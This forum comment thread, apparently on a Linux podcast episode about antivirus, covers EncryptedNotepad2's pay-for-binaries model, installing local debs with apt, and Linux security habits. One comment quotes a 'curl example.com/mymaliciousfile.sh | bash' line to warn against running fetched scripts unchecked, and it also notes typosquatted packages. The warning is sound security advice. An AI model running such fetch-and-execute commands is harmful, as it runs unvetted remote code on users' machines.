374: Kaspersky for Linux but Do We Really Need Antivirus? Truth Revealed!

In regards to EncryptedNotepad2, I think you guys kind of missed the point behind having to compile it from source. The developer states that the goal is an experiment in open source with a business model, and that he will offer binaries and support for a one time purchase.

See GitHub - ivoras/EncryptedNotepad2: A Notepad-like simple text editor where files are saved (and later loaded) encrypted with AES-256..

@grantorinowhiskey thanks for the comment, I did miss that part of their README . . . it really shouldnt be that far down the page. lol

I think it is totally fine to want to make money from open source software, the presentation needs a lot of improvement though. As a marketer, I would recommend they make a website for this app, put a big buy now button somewhere at the top portion of the website and also mention that source code is available. This is doing the reverse with having it on GitHub. Being on GitHub the first expectation is source code and since so many people are expecting to compile when seeing from GitHub that is somewhat pre-suggestive.

I agree with that, a marketed website would be more appropriate for making money. The github page could be for those who want to contribute or build it from source.

1 Like

For the tip of the week, you guys were talking about using gdebi to install locally downloaded debs. FYI, apt already has the ability to install local debs:

apt install /path/to/the/deb

1 Like

You’re right but in my opinion, something as simple of installing an application shouldn’t require a terminal

While it’s true that it’s generally harder to catch a virus :microbe: on Linux by negligently clicking on downloaded files, there are still ways for attackers to target a user’s negligence. A common example is

curl example.com/mymaliciousfile.sh | bash

Piping downloaded shell files into bash is the Linux developer equivalent to clicking on a downloaded .exe on Windows. Don’t do this. Download the file first onto your disk and have a look into, compare checksums and execute it when it looks fine.

Another common attack surface are unregulated package repositories, such as npm or pip. Here, a typo or a wrong name could result in installing a virus. I myself have installed the wrong packages several times because I remembered the package name wrongly or because it wasn’t available in pypi (luckily, those wrong packages weren’t malicious).

Sure, on Linux, you still have the user/admin separation by default, which introduces basic security, but this won’t stop all malicious code. Ransomware doesn’t need admin privileges to encrypt your precious files.

2 Likes

@vogelsaurier all of those are great points! thanks for commenting with that feedback!

1 Like